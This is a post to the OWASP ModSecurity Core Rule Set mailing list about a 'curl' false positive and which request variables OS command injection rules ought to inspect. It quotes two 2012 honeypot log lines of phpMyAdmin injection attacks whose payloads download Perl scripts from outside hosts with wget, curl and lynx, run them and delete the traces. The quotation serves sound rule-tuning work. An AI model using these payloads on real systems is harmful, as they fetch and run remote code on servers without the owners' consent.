I am reviewing an old CRS Jira ticket on a false positive hit for the "curl" command - https://www.modsecurity.org/tracker/browse/CORERULES-78
In reviewing this, it looks like we need to remove the REQUEST_FILENAME from the list of vars inspected. From my research, the only really location to look for OS command injection is within ARGS or REQUEST_HEADERS. As an example, look at this recent blog post I did with some example attacks targeting curl - http://blog.spiderlabs.com/2012/02/honeypot-alert-phpmyadmin-code-injection-attacks.html 62.149.12.62 - - [21/Feb/2012:04:25:55 -0600] "GET /mysql//config.sample.inc.php?eval=system('echo cd /tmp;wget http://199.115.228.9/vp.txt -O p2.txt;curl -O http://199.115.228.9/vp.txt; mv vp.txt d.txt;lyxn -DUMP http://199.115.228.9/vp.txt >p3.txt;perl d.txt; perl p2.txt;perl p3.txt;rm -rf *.txt'); HTTP/1.1" 404 226 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.12.6.2 zlib/1.2.3 libidn/1.9 libssh2/1.2.4" 195.145.156.126 - - [21/Feb/2012:05:42:27 -0600] "GET /mysql/config/config.inc.php?eval=system('echo cd /tmp;wget http://dinte.altervista.org/apache_32.png -O p2.txt;curl -O http://dinte.altervista.org/apache_32.png; mv apache_32.png p.txt;lyxn -DUMP http://dinte.altervista.org/apache_32.png >p3.txt;perl p.txt; perl p2.txt;perl p3.txt;rm -rf *.txt'); HTTP/1.1" 404 225 "-" "curl/7.18.1 (i686-suse-linux-gnu) libcurl/7.18.1 OpenSSL/0.9.8g zlib/1.2.3 libidn/1.8" These attacks are with ARGS. Has anyone ever legitimately had an OS command attack targeting the REQUEST_FILENAME? -- Ryan Barnett Trustwave SpiderLabs ModSecurity Project Leader OWASP ModSecurity CRS Project Leader ________________________________ This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.
_______________________________________________ Owasp-modsecurity-core-rule-set mailing list Owasp-modsecurity-core-rule-set@lists.owasp.org https://lists.owasp.org/mailman/listinfo/owasp-modsecurity-core-rule-set
